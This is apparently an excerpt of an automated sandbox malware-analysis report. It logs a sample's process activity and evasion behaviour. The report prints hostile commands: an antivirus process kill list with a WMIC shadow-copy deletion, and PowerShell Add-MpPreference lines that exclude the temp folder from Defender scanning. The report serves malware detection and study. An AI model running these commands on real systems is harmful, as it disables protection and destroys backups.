Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: eryy65ty.exe, 00000021.00000000.2912147035.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000029.00000000.3080470002.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002C.00000000.3165550384.0000000000AEB000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.30.drBinary or memory string: COULD NOT CREATE CHILD PROCESSWOW64DISABLEWOW64FSREDIRECTIONKERNEL32.DLLWOW64REVERTWOW64FSREDIRECTIONABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\WMIC.EXE\..\\WBEM\\SYSTEM32\\WINDOWS\C:\SHADOWCOPY DELETEAVPMAPP.EXE,ECONCEAL.EXE,SECHEALTHUI.EXE,RUNTIMEBROKER.EXE,ESCANMON.EXE,ESCANPRO.EXE,TRAYSSER.EXE,TRAYICOS.EXE,ECONSER.EXE,VIEWTCP.EXE,FSHDLL64.EXE,FSGK32.EXE,FSHOSTER32.EXE,FSMA32.EXE,FSORSP.EXE,FSSM32.EXE,FSM32.EXE,TRIGGER.EXE,FPROTTRAY.EXE,FPWIN.EXE,FPAVSERVER.EXE,AVK.EXE,GDBGINX64.EXE,AVKPROXY.EXE,GDSCAN.EXE,AVKWCTLX64.EXE,AVKSERVICE.EXE,AVKTRAY.EXE,GDKBFLTEXE32.EXE,GDSC.EXE,VIRUSUTILITIES.EXE,GUARDXSERVICE.EXE,GUARDXKICKOFF_X64.EXE,IPTRAY.EXE,FRESHCLAM.EXE,FRESHCLAMWRAP.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,MPCMDRUN.EXE,NANOSVC.EXE,NANOAV.EXE,NNF.EXE,NVCSVC.EXE,NBROWSER.EXE,NSEUPDATESVC.EXE,NFSERVICE.EXE,CMD.EXETASKKILL/IMNWSCMON.EXE,NJEEVES2.EXE,NVCOD.EXE,NVOY.EXE,ZLHH.EXE,ZLH.EXE,NPROSEC.EXE,ZANDA.EXE,NS.EXE,ACS.EXE,OP_MON.EXE,PSANHOST.EXE,PSUAMAIN.EXE,PSUASERVICE.EXE,AGENTSVC.EXE,BDSSVC.EXE,EMLPROXY.EXE,OPSSVC.EXE,ONLINENT.EXE,QUHLPSVC.EXE,SAPISSVC.EXE,SCANNER.EXE,SCANWSCS.EXE,SCPROXYSRV.EXE,SCSECSVC.EXE,SUPERANTISPYWARE.EXE,SASCORE64.EXE,SSUPDATE64.EXE,SUPERDELETE.EXE,SASTASK.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,UIWINMGR.EXE,UIWATCHDOG.EXE,UISEAGNT.EXE,PTWATCHDOG.EXE,PTSVCHOST.EXE,PTSESSIONAGENT.EXE,COREFRAMEWORKHOST.EXE,CORESERVICESHELL.EXE,UIUPDATETRAY.EXE,VIPREUI.EXE,SBAMSVC.EXE,SBAMTRAY.EXE,SBPIMSVC.EXE,BAVHM.EXE,BAVSVC.EXE,BAVTRAY.EXE,BAV.EXE,BAVWEBCLIENT.EXE,BAVUPDATER.EXE,MCSHIELDCCC.EXE,MCSHIELDRTM.EXE,MCSHIELDDS.EXE,MCS-UNINSTALL.EXE,SDSCAN.EXE,SDFSSVC.EXE,SDWELCOME.EXE,SDTRAY.EXE,UNTHREAT.EXE,UTSVC.EXE,FORTICLIENT.EXE,FCAPPDB.EXE,FCDBLOG.EXE,FCHELPER64.EXE,FMON.EXE,FORTIESNAC.EXE,FORTIPROXY.EXE,FORTISSLVPNDAEMON.EXE,FORTITRAY.EXE,FORTIFW.EXE,FORTICLIENT_DIAGNOSTIC_TOOL.EXE,AV_TASK.EXE,CERTREG.EXE,FILMSG.EXE,FILUP.EXE,FILWSCC.EXE,FILWSCC.EXE,PSVIEW.EXE,QUAMGR.EXE,QUAMGR.EXE,SCHMGR.EXE,SCHMGR.EXE,TWSSCAN.EXE,TWSSRV.EXE,USERREG.EXESEDEBUGPRIVILEGECOULD NOT SET SE_DEBUG_NAME PRIVILEGE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4345Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2865Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7509Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2019Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4311Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2900Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6894
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2854
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4699
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5063
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep count: 4345 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep count: 2865 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 7509 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 2019 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2900Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 4311 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 2900 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 6894 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep count: 2854 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 4699 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 5063 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 7492Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8108Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 2032Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 2032Thread sleep count: 41 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 6052Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 7048Thread sleep count: 74 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4284Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\wtr\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\
Source: svchost.exe, 0000000A.00000002.3826597991.000001FE8062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW /c
Source: svchost.exe, 0000000A.00000002.3826597991.000001FE8062B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3828054651.000001FE85C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 1696507613314.344809ee-0a17-4796-893a-1909a35962e3.main.jsonlz4.33.drBinary or memory string: "VMware V[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
